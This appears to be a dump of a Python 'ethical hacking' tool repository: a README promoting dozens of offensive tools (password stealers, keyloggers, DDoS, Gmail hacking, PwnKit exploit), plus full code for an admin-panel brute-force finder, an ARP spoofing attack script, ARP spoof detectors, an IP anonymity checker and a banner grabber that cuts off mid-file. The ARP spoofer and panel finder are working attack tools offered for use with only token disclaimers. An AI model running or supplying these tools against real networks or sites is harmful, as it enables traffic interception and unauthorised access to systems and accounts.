├── LICENSE.MD ├── README.MD ├── admin-login.txt ├── admin-panel-finder.py ├── admin-panel-sniffer.py ├── am-I-anonymous.py ├── arp-spoofing-detect.py ├── arp-spoofing-detectv2.py ├── arp-spoofing.py ├── banner-grabber.py ├── bruteforce_ssh.py ├── cam-hackers.py ├── chrome-cookie_extractor.py ├── chrome-pass-remover.py ├── chrome-pass-stealer.py ├── click-jacking-vul-scan.py ├── ddos.py ├── decrypt.py ├── dns-enumeration.py ├── exif-remover.py ├── exif.py ├── fakemail.py ├── fakesms.py ├── filemonitor.py ├── get_wifipass.py ├── getip.py ├── hack-gmail.py ├── hulk-gui.py ├── insta.py ├── instagram-osint.py ├── ip-scanner.py ├── keylogger-in-python.py ├── linux_pass_cracker.py ├── mac-changer.py ├── malware.py ├── md5hashcracker.py ├── my-most-used-nmap-scripts.py ├── network-monitoring.py ├── network-scanner.py ├── packet-sniffer.py ├── packet-sniffer2.py ├── pass-gen-gui.py ├── password.txt ├── password_generator.py ├── passwordsniffer.py ├── pdf-exif-tool.py ├── pdf-exif-toolv2.py ├── phone-number-info.py ├── phpvuln.py ├── portscanner-gui.py ├── portscanner.py ├── py-keylogger.py ├── random_token_generator.py ├── requirements.txt ├── rockyou.txt ├── shodan_api.py ├── shut-my-pc-down.py ├── sites.txt ├── sql_injection_detector.py ├── sqli-scanner-mod.py ├── steganography.py ├── subdomain-finder.py ├── sys-info.py ├── tcp-scanner.py ├── test.py ├── website-vulnerability-finder.py ├── wifi_dos_final.py ├── wifi_dos_v1.py ├── wifi_dos_v2.py ├── windows-10-mac-changer.py ├── wordlist.txt └── xss-vulnerability-finder.py /LICENSE.MD: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Sumalya Chatterjee 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.MD: -------------------------------------------------------------------------------- 1 |

Python For Ethical Hacking

2 |

Typing SVG


3 | 4 | 5 | # 6 | Typing SVG 7 | 8 | # 9 |

🔴 Also Check out My Bash For Ethical Hackers Project

10 | 11 | # 12 |

Author :

Sumalya Chatterjee

13 | 14 | # 15 | 16 | 17 | # 18 |

What is Ethical Hacking?

19 |

The term hacking goes a long way back. To be exact, it all started at the Railroad Club of MIT, where both the term ‘hacking’ and ‘hacker’ were first coined. It’s been almost 50 years now, and hacking has evolved into a discipline in the current day and age. With the increase in awareness regarding data protection and data privacy, hacking has been deemed as an illegal activity today. If caught, there’s a good chance that you will be prosecuted for quite some time depending on the degree of harm caused. 20 | 21 | None the less, to protect themselves from hackers of all sorts, employment of Ethical Hackers has become a common practice amongst organizations. Ethical hackers are given the responsibility of finding and fixing security flaws for a certain organization before black hat hackers find them.


22 | 23 | # 24 | 25 |

What is Python?

26 |

Python is a general-purpose scripting language that has gained immense popularity amongst professionals and beginners for its simplicity and powerful libraries. Python is insanely versatile and can be used for almost any kind of programming. From building small scale scripts that are meant to do banal tasks, to large scale system applications – Python can be used anywhere and everywhere. In fact, NASA actually uses Python for programming their equipment and space machinery. 27 | 28 | Python can also be used to process text, display numbers or images, solve scientific equations, and save data. In short, Python is used behind the scenes to process a lot of elements you might need or encounter on your devices.


29 | 30 | # 31 |

Why Python?

32 |

Python has gained its popularity mostly because of its super powerful yet easy to use libraries. Sure Python has awesome readability and it is really simple and all but nothing really beats the fact your job as a developer is made super simple with these libraries. These libraries find uses in all sorts of domains, for example, artificial intelligence has Pytorch and Tensorflow while Data Science has Pandas, Scapy, Numpy, Matplotlib.


33 | 34 | # 35 |

Why hackers should learn Python for pen testing

36 |

Python is used among hacking professionals for its powerful and user-friendly libraries. It provides readability and simplicity, which can help you complete your tasks more quickly and easily. Python libraries are also used for code-cracking, decoding, network scanning, and even network attacks.


37 | 38 | # 39 |

Python Libraries for Ethical Hacking

40 | 41 |

Python is vastly popular because of its super-powerful yet easy-to-use libraries that are easily available to developers. Despite the fact that Python comes with minimal syntax and awesome readability, but nothing beats the fact that developer’s lives get really simple with these libraries which are available in all sorts of domains, for example, artificial intelligence has PI touch intensive loop while data science has pandas, NumPy, matplotlib, and so on. Here are some of the top 7 Python libraries used for hacking and each one has its unique identification and function.



42 | 43 |

1. Requests

44 | 45 |

The requests library helps one to allow HTTP requests to be more user-friendly. It returns responsive objects including data of status, encoding, and content. It is a module that can be used to send all kinds of HTTP requests it is very easy to use and has features like passing parameters in the URL and passing custom headers as well. It is a human-friendly HTTP library as it also suggests on the official documentation page as well and it is one of the most downloaded Python libraries with more than 400,000 downloads every day. Python requests are so popular because developers don’t have to manually add the queries to the URLs and form encode post data and that is reason enough to use Python requests.


46 | 47 |

2. Cryptography

48 | 49 |

Cryptography is a library that helps with encryption as well as the description of sets of data. The library includes primitives supported by Python 3.3+, Python 2.6-2.7. Cryptography involves the amalgamation of two layers that is, namely safe cryptographic recipes that require minimum configuration choices. While another one is low-level cryptography which is most dangerous and can be used incorrectly. This python library helps to secure information with the help of effectively developed codes. Cryptography includes the generation of random numbers, digital signatures, hashing, stream ciphers, and hashing.


50 | 51 |

3. Python-Nmap

52 | 53 |

Nmap is a typical network scanner tool using IP packets for the identification of devices on a network and information regarding operating systems. With the use of the Nmap port scanner, this library helps the system administrators automate the task for scanning reports supporting the Nmap scripts outputs. Nmap helps to identify and discover hosts on networks and detects the version number, application name functioning on any remote devices.


54 | 55 |

4. Impacket

56 | 57 |

The library consists of Python scripts that aids with working on network protocols, it ensures low-level programming access to other packets along with the implementation of the protocols. Packets can be made out of raw data, and the API makes deep hierarchies protocols work efficiently. Impacket’s goal is to make tasks easier for programmers so that they can work under a framework while abiding by some custom protocols.


58 | 59 |

5. Scapy

60 | 61 |

The tool to manipulate network packets, helping with discovering networks, probing, tracing, routing, and scanning. Scapy includes diverse functionalities apart from packet sniffing and can be customized as peruse. It can be run on Linux, Mac OS, and windows. It presents decoded packets with the interpretation depending on the user. Scapy works to bring semblance between high leveled protocols and low-level networks programming.


62 | 63 |

6. RawSocketPy

64 | 65 |

A layer 2 python library that encourages communication with MAC addresses. One can create custom-made WiFi communication using rawsocketpy. A non-simultaneous server with an uptight capability with no encryption needs an MTU of 1500. Rawsocketpy does not involve transmission control protocol or user datagram protocol.


66 | 67 |

7. Pylibnet

68 | 69 |

A libnet packet injection library ensures functionality for sending packets, presentation of libcap traces along with having a python API for libnet packets. These are some of the python libraries holding an efficacy under ethical hacking. Python language is used by tech companies because of its versatility and secure algorithms. Python gained much popularity in the last few decades. It has been used by a lot of developers, hackers of big companies because of its easy-to-understand and general-purpose syntax that can be applied to a large number of programming domains. There are countless python libraries available on the web, but the ones listed above are best suited for ethical hacking.


70 | 71 | # 72 |

This Repo Has Sub-repos 👇👇👇 JUST CLICK ON IT ====>

73 | 74 | ## 01. [Admin Panel Finder](https://github.com/R3DHULK/is-this-your-admin) 75 | ## 02. [Arp Spoofing](https://github.com/R3DHULK/mission-arp) 76 | ## 03. [Arp Spoofing Detection](https://github.com/R3DHULK/mission-arp) 77 | ## 04. [Banner Grabber](https://github.com/R3DHULK/BannerGrab) 78 | ## 05. [BruteForce SSH](https://github.com/R3DHULK/bruteforce_ssh) 79 | ## 06. [Target: Chrome ](https://github.com/R3DHULK/targetting-chrome) 80 | ## 07. [DDOS](https://github.com/R3DHULK/HULK) 81 | ## 08. [Malware In Python](https://github.com/R3DHULK/malware-in-python) 82 | ## 09. [Image Exif Tool](https://github.com/R3DHULK/exif) 83 | ## 10. [Image Exifs Remover](https://github.com/R3DHULK/exif) 84 | ## 11. [PDF Exif Tool](https://github.com/R3DHULK/pdf-exif) 85 | ## 12. [Fake Mail](https://github.com/R3DHULK/fakemail) 86 | ## 13. [Keylogger](https://github.com/R3DHULK/keylogger-in-python) 87 | ## 14. [Password Sniffer](https://github.com/R3DHULK/passwordsniffer) 88 | ## 15. [File Monitor](https://github.com/R3DHULK/watchdog) 89 | ## 16. [Get Wifi-Password](https://github.com/R3DHULK/get_wifipass) 90 | ## 17. [System Information Gathering](https://github.com/R3DHULK/get-system-information) 91 | ## 18. [IP Scanner](https://github.com/R3DHULK/ip-scanner) 92 | ## 19. [Gmail Hacking](https://github.com/R3DHULK/ip-scanner) 93 | ## 20. [Network Monitoring](https://github.com/R3DHULK/all-about-network) 94 | ## 21. [Network Scanner](https://github.com/R3DHULK/ip-scanner) 95 | ## 22. [Port Scanner](https://github.com/R3DHULK/HulkScanner) 96 | ## 23. [Random Password And Token Generator](https://github.com/R3DHULK/password_and_token-generator) 97 | ## 24. [Shut Down My PC (For Windows Users Only)](https://github.com/R3DHULK/shut-my-pc-down) 98 | ## 25. [Shodan](https://github.com/R3DHULK/utilise_SHODAN-API) 99 | ## 26. [Sql Injection Detection](https://github.com/R3DHULK/sql-injection-detector) 100 | ## 27. [Steganography](https://github.com/R3DHULK/steganography) 101 | ## 28. [Subdomain Finder](https://github.com/R3DHULK/find-subdomains) 102 | ## 29. [Wifi DDoS Attack](https://github.com/R3DHULK/target-wifi) 103 | ## 30. [XSS Vulnerability Scanner](https://github.com/R3DHULK/xss-police) 104 | ## 31. [TCP Scanner](https://github.com/R3DHULK/HulkScanner) 105 | ## 32. [BruteForce Password](https://github.com/R3DHULK/bruteforce-password) 106 | ## 33. [Linux Password Cracker](https://github.com/R3DHULK/linux-pass-cracker) 107 | ## 34. [Bad USB](https://github.com/R3DHULK/bad-usb) 108 | ## 35. [Fake Details Generator](https://github.com/R3DHULK/lets-fake-it) 109 | ## 36. [Password Sniffer](https://github.com/R3DHULK/passwordsniffer) 110 | ## 37. [PwnKit Exploit](https://github.com/R3DHULK/Pwnkit-exploit) 111 | ## 38. [Mac Address Changer](https://github.com/R3DHULK/Mac-Changer) 112 | ## 39. [Anonymity Checker](https://github.com/R3DHULK/am-i-anonymous) 113 | # 114 |

Git Installation :

115 | 116 | ``` 117 | sudo apt install git 118 | 119 | sudo apt install python 120 | 121 | git clone https://github.com/R3DHULK/python-for-ethical-hacking 122 | 123 | cd python-for-ethical-hacking 124 | 125 | python -m pip install -r requirements.txt 126 | 127 | sudo python 128 | ``` 129 | 130 | # 131 |

Found Issues??

132 |

133 | 134 |

In Future Releases Founded Bugs Will Be Resolved And Many Other Tools Will Be Added 😇😇😊😊

135 | 136 | # 137 |

Show Support 👇👇👇

138 | https://www.buymeacoffee.com/r3dhulk

139 | 140 | -------------------------------------------------------------------------------- /admin-panel-sniffer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #import required modules 3 | from datetime import datetime as dt 4 | import sys, random, optparse, time, os 5 | try:#python 3 6 | import urllib.request as req 7 | from urllib.error import URLError, HTTPError 8 | three = True 9 | except ImportError:#python 2 10 | import urllib2 as req 11 | three = False 12 | 13 | #custom header to avoid being blocked by the website 14 | custom_headers = {"User-Agent" : "Mozilla/5.0 (Windows NT {}; rv:{}.0) Gecko/20100101 Firefox/{}.0".format(random.randint(7,11), 15 | random.randint(40,50), 16 | random.randint(35,50))} 17 | 18 | def adjustDomainName(domain):#correct domain name for urllib 19 | if domain.startswith("www."): 20 | domain = domain[4:] 21 | if not domain.startswith("http"): 22 | domain = "http://" + domain 23 | if domain.endswith("/"): 24 | domain = domain[:-1] 25 | return domain 26 | 27 | def loadWordList(wordlist_file, ext):#load pages to check from dictionary 28 | try: 29 | with open(wordlist_file, encoding="utf8") as wlf: 30 | content = wlf.readlines() 31 | for i in range(len(content)): 32 | content[i] = content[i].strip("\n") 33 | if ext.lower() == "a": 34 | return content 35 | else: 36 | return [element for element in content if element.endswith(ext) or element.endswith("/")] 37 | except FileNotFoundError: 38 | sys.exit("Couldn't find wordlist file!") 39 | 40 | def saveResults(file_name, found_pages, progress=0): 41 | now = dt.now() 42 | with open("admin_sniffer_results.txt", "a") as f: 43 | stamp = "%d-%d-%d %d: %d: %d" % (now.year, now.month, now.day, now.hour, now.minute, now.second) 44 | print(stamp, file=f) 45 | for page in found_pages: 46 | print(page, file=f) 47 | print("total progress: %d\n______________________________________________" % progress, file=f) 48 | 49 | def main(domain, progress=0, ext="a", strict=False, save=True, visible=True, wordlist_file="admin_login.txt"): 50 | print(" [+] HULK Is On Progress... Feel Free To Press Ctrl+C At Any Point To Abort...") 51 | resp_codes = {403 : "request forbidden", 401 : "authentication required"}#HTTP response codes 52 | found = []#list to hold the results we find 53 | domain = adjustDomainName(domain)#correct domain name for urllib 54 | 55 | print(" [+] Loading Wordlist...") 56 | attempts = loadWordList(wordlist_file, ext) 57 | print(" [+] Crawling...") 58 | 59 | for link in attempts[progress:]:#loop over every page in the wordlist file 60 | try: 61 | site = domain + "/" + link 62 | 63 | if visible:#show links as they're being tested 64 | print(" trying:", end=" ") 65 | 66 | panel_page = req.Request(site, headers=custom_headers) 67 | 68 | try: 69 | resp = req.urlopen(site)#try visiting the page 70 | found.append(site) 71 | print(" ✔️✔️✔️ " "%s page valid!" % site) 72 | 73 | except HTTPError as e:#investigate the HTTPError we got 74 | if three: 75 | c = e.getcode() 76 | else: 77 | c = e.code() 78 | 79 | if c == 404: 80 | if visible: 81 | print("%s not found..." % site) 82 | else: 83 | print("%s potential positive.. %s" % (site, resp_codes[c])) 84 | if not strict: 85 | found.append(site) 86 | 87 | except URLError: 88 | print("invalid link or no internet connection!") 89 | break 90 | 91 | except Exception as e2: 92 | print("an exception occured when trying {}... {}".format(site, e2)) 93 | continue 94 | progress += 1 95 | 96 | except KeyboardInterrupt:#make sure we don't lose everything should the user get bored 97 | print() 98 | break 99 | 100 | if found: 101 | if save:#save results to a text file 102 | print("Saving results...") 103 | saveResults("admin_sniffer_results.txt", found) 104 | 105 | print("results saved to admin_sniffer_results.txt...") 106 | 107 | print("found the following results: " + " ".join(found) + " total progress: %s" % progress) 108 | 109 | else: 110 | print("could not find any panel pages... Make sure you're connected to the internet\n" \ 111 | + "or try a different wordlist. total progress: %s" % progress) 112 | 113 | def getRobotsFile(domain): 114 | print("Attempting to get robots.txt file...") 115 | found = [] 116 | domain = adjustDomainName(domain)#correct domain name for urllib 117 | 118 | robots_file = domain + "/robots.txt" 119 | try: 120 | data = req.urlopen(robots_file).read().decode("utf-8") 121 | for element in data.split("\n"): 122 | if element.startswith("Disallow:"): 123 | panel_page = domain + element[10:] 124 | print("Disallow rule found: %s" % (panel_page)) 125 | found.append(panel_page) 126 | if found: 127 | print("admin panels found... Saving results to file...") 128 | saveResults("admin_sniffer_results.txt", found, 0) 129 | print("done...") 130 | else: 131 | print("could not find any panel pages in the robots file...") 132 | except: 133 | sys.exit("Could not retrieve robots.txt!") 134 | try: 135 | def slowprint(l): 136 | for c in l + '\n' : 137 | sys.stdout.write(c) 138 | sys.stdout.flush() 139 | time.sleep(10. / 100) 140 | print("") 141 | os.system('clear') 142 | slowprint("\033[91m************* Screen Loading For You *************** ") 143 | def bannerprint(h): 144 | for c in h + '\n' : 145 | sys.stdout.write(c) 146 | sys.stdout.flush() 147 | time.sleep(100000. / 10000000) 148 | bannerprint('''\033[92m 149 | _ 150 | (_)___ 151 | | (_-< 152 | |_/__/ _ _ 153 | | |_| |_ (_)___ 154 | | _| ' \| (_-< _ _ 155 | _ \__|_||_|_/__/_ __ _ __| |_ __ (_)_ _ 156 | | || / _ \ || | '_| / _` / _` | ' \| | ' \ 157 | \_, \___/\_,_|_| \__,_\__,_|_|_|_|_|_||_|??? 158 | |__/ coded by R3DHULK 159 | github page : https://github.com/R3DHULK 160 | ''') 161 | def slowprint(s): 162 | for c in s + '\n' : 163 | sys.stdout.write(c) 164 | sys.stdout.flush() 165 | time.sleep(10. / 100) 166 | slowprint(" [!] RESPECT OTHER'S PRIVACY ") 167 | time.sleep(2) 168 | os.system('clear') 169 | print('''\033[92m 170 | _ 171 | (_)___ 172 | | (_-< v.2.O 173 | |_/__/ _ _ 174 | | |_| |_ (_)___ 175 | | _| ' \| (_-< _ _ 176 | _ \__|_||_|_/__/_ __ _ __| |_ __ (_)_ _ 177 | | || / _ \ || | '_| / _` / _` | ' \| | ' \ 178 | \_, \___/\_,_|_| \__,_\__,_|_|_|_|_|_||_|??? 179 | |__/ coded by R3DHULK 180 | github page : https://github.com/R3DHULK 181 | ''') 182 | except KeyboardInterrupt: 183 | print(" \n [-] You Have Entered CTRL + C .... \n [-] Exiting Loading Period... \n [+] Continuing From Next Part....\n ") 184 | try: 185 | if __name__ == "__main__": 186 | 187 | parser = optparse.OptionParser("Usage: python %prog --domain " \ 188 | + "--progress " \ 189 | + "--page_extension --strict " \ 190 | + "--save " \ 191 | + "--verbose --wordlist " \ 192 | + "--robots ") 193 | 194 | domain_help = "target domain. eg: google.com or www.example.org" 195 | progress_help = "(optional) index of the page the script reached last run. The script " \ 196 | + "displays and saves this value in the results file after every run. "\ 197 | + "0 starts from the beginning." 198 | page_extension_help = "(optional) whether the website uses html asp php... default value is 'a' which checks everything" 199 | strict_mode_help = "(optional, default False) if True, HTTP codes that correspond to forbidden or " \ 200 | + "authentication required will be ignored." 201 | save_help = "(optional, default True) if True results will be saved to a txt file." 202 | verbose_help = "(optional, default True) if True each link will be shown as it's being tested." 203 | wordlist_help = "(optional, default is the included wordlist) wordlist file to be used." 204 | robots_help = "(optional, default False) if True the script will try to get the robots.txt " \ 205 | + "file that usually contains the admin panel. If you set it to True, don't enter" \ 206 | + "anything else except the target domain." 207 | 208 | parser.add_option("--domain", dest="domain", type="string", help=domain_help) 209 | parser.add_option("--progress", dest="progress", type="string", help=progress_help) 210 | parser.add_option("--page_extension", dest="page_ext", type="string", help=page_extension_help) 211 | parser.add_option("--strict", dest="strict", type="string", help=strict_mode_help) 212 | parser.add_option("--save", dest="save", type="string", help=save_help) 213 | parser.add_option("--verbose", dest="verbose", type="string", help=verbose_help) 214 | parser.add_option("--wordlist", dest="wordlist", type="string", help=wordlist_help) 215 | parser.add_option("--robots", dest="robots", type="string", help=robots_help) 216 | 217 | (options, args) = parser.parse_args() 218 | 219 | if not options.domain: 220 | sys.exit(" [!] Hulk Wants You To Enter A Target Domain : \n\n%s" % parser.usage) 221 | if not options.wordlist: 222 | sys.exit(" [*] Please Enter A Wordlist File Or Go With Inbuilt Wordlist : \n\n%s" % parser.usage) 223 | 224 | try: 225 | strict_mode = eval(options.strict.title()) 226 | except: 227 | strict_mode = False 228 | 229 | try: 230 | save = eval(options.save.title()) 231 | except: 232 | save = True 233 | 234 | try: 235 | verbose = eval(options.verbose.title()) 236 | except: 237 | verbose = True 238 | 239 | if not options.page_ext: 240 | page_ext = 'a' 241 | else: 242 | page_ext = options.page_ext 243 | 244 | if not options.progress: 245 | progress = 0 246 | else: 247 | progress = int(options.progress) 248 | 249 | if not options.wordlist: 250 | wordlist = "admin_login.txt" 251 | else: 252 | wordlist = options.wordlist 253 | 254 | try: 255 | robots = eval(options.robots.title()) 256 | except: 257 | robots = False 258 | 259 | if robots: 260 | getRobotsFile(options.domain) 261 | else: 262 | main(options.domain, progress, page_ext, strict_mode, save, verbose, wordlist) 263 | except KeyboardInterrupt: 264 | print("\n [-] Ctrl + C Detected \n") 265 | try: 266 | input(" [+] Enter To Exit " ) 267 | def slowprint(f): 268 | for c in f + '\n' : 269 | sys.stdout.write(c) 270 | sys.stdout.flush() 271 | time.sleep(10. / 100) 272 | slowprint("\n\033[91m [+] Exiting.... Thanks For Using My Tool \n") 273 | time.sleep(2) 274 | os.system('clear') 275 | except KeyboardInterrupt: 276 | print( "\n\033[90m [-] See You Again ^-^ ") 277 | -------------------------------------------------------------------------------- /am-I-anonymous.py: -------------------------------------------------------------------------------- 1 | from ip2geotools.databases.noncommercial import DbIpCity 2 | import requests 3 | logo = ''' 4 | _____ 5 | _ |___ | 6 | ___ _____ |_| ___ ___ ___ ___ _ _ _____ ___ _ _ ___ | _| 7 | | .'| | | | | .'| | . | | | | | . | | |_ -| |_| 8 | |__,|_|_|_| |_| |__,|_|_|___|_|_|_ |_|_|_|___|___|___| |_| 9 | |___| 10 | code from R3DHULK github page : https://github.com/R3DHULK 11 | ''' 12 | print(logo) 13 | ANSI_COLOR_SAFE = '\033[92m' 14 | ANSI_COLOR_NOTSAFE = '\033[91m' 15 | 16 | def fetch_public_ip(): 17 | fetch_adress = 'https://checkip.amazonaws.com' 18 | return requests.get(fetch_adress).text.strip() 19 | 20 | def resolve_city(ip): 21 | response = DbIpCity.get(ip, api_key='free') 22 | return response.city 23 | 24 | def resolve_country(ip): 25 | response = DbIpCity.get(ip, api_key='free') 26 | return response.country 27 | 28 | def main(): 29 | public_ip = fetch_public_ip() 30 | city = resolve_city(public_ip) 31 | country = resolve_country(public_ip) 32 | 33 | # Setting font color depending on country 34 | if country != 'DE': 35 | safe = True 36 | print(f'{ANSI_COLOR_SAFE}', end='') 37 | else: 38 | safe = False 39 | print(f'{ANSI_COLOR_NOTSAFE}', end='') 40 | 41 | print('///////////////////////////////////////////////') 42 | print('Public IP: {}'.format(public_ip)) 43 | print('Location: {}, {}'.format(city, country)) 44 | print('\n') 45 | 46 | if safe: 47 | print(" [!] It seems, that you're safe!\n") 48 | else: 49 | print(' [!] Hmmm... Check the VPN one more time!\n') 50 | 51 | print('///////////////////////////////////////////////') 52 | 53 | if __name__ == '__main__': 54 | main() 55 | input(" press close to exit ") 56 | -------------------------------------------------------------------------------- /arp-spoofing-detect.py: -------------------------------------------------------------------------------- 1 | # Implementing ARP Spoof Attack Detection Using Scapy 2 | 3 | # import modules 4 | import scapy.all as scapy 5 | import time, sys 6 | 7 | # code to get MAC Address 8 | def mac(ipadd): 9 | # requesting arp packets from the IP address 10 | # if it's wrong then will throw error 11 | arp_request = scapy.ARP(pdst=ipadd) 12 | br = scapy.Ether(dst="ff:ff:ff:ff:ff:ff") 13 | arp_req_br = br / arp_request 14 | list_1 = scapy.srp(arp_req_br, timeout=5, 15 | verbose=False)[0] 16 | return list_1[0][1].hwsrc 17 | 18 | # taking interface of the system as an argument 19 | # to sniff packets inside the network 20 | def sniff(interface): 21 | # store=False tells sniff() function 22 | # to discard sniffed packets 23 | scapy.sniff(iface=interface, store=False, 24 | prn=process_sniffed_packet) 25 | 26 | 27 | # defining function to process sniffed packet 28 | def process_sniffed_packet(packet): 29 | # if it is an ARP packet and if it is an ARP Response 30 | if packet.haslayer(scapy.ARP) and packet[scapy.ARP].op == 2: 31 | 32 | # originalmac will get old MAC whereas 33 | originalmac = mac(packet[scapy.ARP].psrc) 34 | # responsemac will get response of the MAC 35 | responsemac = packet[scapy.ARP].hwsrc 36 | def slowprint(s): 37 | for c in s + '\n' : 38 | sys.stdout.write(c) 39 | sys.stdout.flush() 40 | time.sleep(10. / 100) 41 | 42 | try: 43 | # machine interface is "eth0", sniffing the interface 44 | sniff(input("\033[92m [*] Enter Interface : ")) 45 | except KeyboardInterrupt: 46 | slowprint("\n\033[91m [-] Exiting...") 47 | time.sleep(2) 48 | -------------------------------------------------------------------------------- /arp-spoofing-detectv2.py: -------------------------------------------------------------------------------- 1 | from scapy.all import Ether, ARP, srp, sniff, conf 2 | try: 3 | def get_mac(ip): 4 | """ 5 | Returns the MAC address of `ip`, if it is unable to find it 6 | for some reason, throws `IndexError` 7 | """ 8 | p = Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip) 9 | result = srp(p, timeout=3, verbose=False)[0] 10 | return result[0][1].hwsrc 11 | 12 | def process(packet): 13 | # if the packet is an ARP packet 14 | if packet.haslayer(ARP): 15 | # if it is an ARP response (ARP reply) 16 | if packet[ARP].op == 2: 17 | try: 18 | # get the real MAC address of the sender 19 | real_mac = get_mac(packet[ARP].psrc) 20 | # get the MAC address from the packet sent to us 21 | response_mac = packet[ARP].hwsrc 22 | # if they're different, definitely there is an attack 23 | if real_mac != response_mac: 24 | print(f" [!] You are under attack, REAL-MAC: {real_mac.upper()}, FAKE-MAC: {response_mac.upper()}") 25 | except IndexError: 26 | # unable to find the real mac 27 | # may be a fake IP or firewall is blocking packets 28 | pass 29 | 30 | if __name__ == "__main__": 31 | import sys 32 | try: 33 | iface = sys.argv[1] 34 | except IndexError: 35 | iface = conf.iface 36 | sniff(store=False, prn=process, iface=iface) 37 | except KeyboardInterrupt: 38 | print("\n\033[91m [-] Exiting....") 39 | -------------------------------------------------------------------------------- /arp-spoofing.py: -------------------------------------------------------------------------------- 1 | import scapy.all as scapy 2 | import time 3 | 4 | print(''' 5 | ************************************************************* 6 | * _ ___ ___ ___ ___ ___ ___ ___ ___ _ _ ___ * 7 | * /_\ | _ \ _ \___/ __| _ \/ _ \ / _ \| __|_ _| \| |/ __| * 8 | * / _ \| / _/___\__ \ _/ (_) | (_) | _| | || .` | (_ | * 9 | * /_/ \_\_|_\_| |___/_| \___/ \___/|_| |___|_|\_|\___| * 10 | * * 11 | * [!] Don't Use For Malicious Purposes * 12 | * [!] I will not reconsider your jobs * 13 | ************************************************************* 14 | ''') 15 | def get_mac(ip): 16 | arp_request = scapy.ARP(pdst = ip) 17 | broadcast = scapy.Ether(dst ="ff:ff:ff:ff:ff:ff") 18 | arp_request_broadcast = broadcast / arp_request 19 | answered_list = scapy.srp(arp_request_broadcast, timeout = 5, verbose = False)[0] 20 | return answered_list[0][1].hwsrc 21 | 22 | def spoof(target_ip, spoof_ip): 23 | packet = scapy.ARP(op = 2, pdst = target_ip, hwdst = get_mac(target_ip), 24 | psrc = spoof_ip) 25 | scapy.send(packet, verbose = False) 26 | 27 | 28 | def restore(destination_ip, source_ip): 29 | destination_mac = get_mac(destination_ip) 30 | source_mac = get_mac(source_ip) 31 | packet = scapy.ARP(op = 2, pdst = destination_ip, hwdst = destination_mac, psrc = source_ip, hwsrc = source_mac) 32 | scapy.send(packet, verbose = False) 33 | 34 | 35 | target_ip = input(" [?] Enter your target IP : ") 36 | gateway_ip = input(" [?]Enter your gateway's IP : ") 37 | 38 | try: 39 | sent_packets_count = 0 40 | while True: 41 | spoof(target_ip, gateway_ip) 42 | spoof(gateway_ip, target_ip) 43 | sent_packets_count = sent_packets_count + 2 44 | print("\r [*] Packets Sent "+str(sent_packets_count), end ="") 45 | time.sleep(2) # Waits for two seconds 46 | 47 | except KeyboardInterrupt: 48 | print("\n Ctrl + C pressed.............Exiting") 49 | restore(gateway_ip, target_ip) 50 | restore(target_ip, gateway_ip) 51 | print(" Restoring session......") 52 | print(" [+] Arp Spoof Stopped") 53 | -------------------------------------------------------------------------------- /banner-grabber.py: -------------------------------------------------------------------------------- 1 | import socket,sys,time 2 | 3 | logo = '''\033[92m 4 | ___ ___ _ _ 5 | | _ ) __ _ _ _ _ _ ___ _ _ / __|_ _ __ _| |__| |__ ___ _ _ 6 | | _ \/ _` | ' \| ' \/ -_) '_| | (_ | '_/ _` | '_ \ '_ \/ -_) '_| 7 | |___/\__,_|_||_|_||_\___|_| \___|_| \__,_|_.__/_.__/\___|_| 8 | 9 | coded by Sumalya Chatterjee 10 | ''' 11 | print(logo) 12 | try: 13 | def slowprint(s): 14 | for c in s + '\n' : 15 | sys.stdout.write(c) 16 | sys.stdout.flush() 17 | time.sleep(10. / 100) 18 | def ban_grab(host, port, delay) : 19 | ''' 20 | This function takes three parameters from main() to process and get the banner of the requested port 21 | It has a specific condition for HTTP port which make this program more flexible than other simple 22 | banner grabbers 23 | 24 | :param host: Ask HULK a IP ADDRESS or URL 25 | :param port: HULK REQUESTED PORT 26 | :param delay: TIME DELAY for SEARCH 27 | :return: None 28 | ''' 29 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Making a TCP socket 30 | try : 31 | s.settimeout(delay) 32 | if port == 80 : # If user requested port is 80 33 | s.connect((str(host), port)) 34 | GET = 'GET / HTTP/1.1\nHost: '+ str(host) +'\n\n' # Request more than ordinary three way handshake 35 | s.sendall(str.encode(GET)) 36 | banner = s.recvfrom(512) # Important part of the banner received 37 | 38 | else : 39 | s.connect((str(host), port)) # Trying normal TCP handshake and getting banner 40 | banner = s.recvfrom(512) 41 | 42 | banner = banner[0] 43 | banner = banner.splitlines() # Processing received banner 44 | for line in banner: 45 | line = str(line) 46 | line = line.replace('\'','') # Removing unnecessary part of the line 47 | print(line[1::]) 48 | 49 | except Exception as er : 50 | slowprint('\033[91m Error : ' + str(er)) # Exception handling 51 | 52 | finally : 53 | s.close() # Closing socket 54 | 55 | def user_input(msg) : # Checking for keyboard interrupt 56 | while True : 57 | try : 58 | return input(msg) 59 | except KeyboardInterrupt : 60 | slowprint('\033[91m [-] HULK does not allowed you to quit right now !') 61 | 62 | def main() : 63 | host = user_input('\033[92m [+] Ask HULK a IP or URL : ') # Taking and validating user inputs 64 | port = int(user_input('\033[92m [+] Ask HULK a port : ')) 65 | if port < 1 or port > 65535 : 66 | slowprint('\033[91m [+] Invalid input for port\nDefault set 80') 67 | port = 80 68 | delay = int(user_input('\033[92m [+] Enter delay : ')) 69 | if delay < 0 or delay > 100 : 70 | slowprint('\033[91m 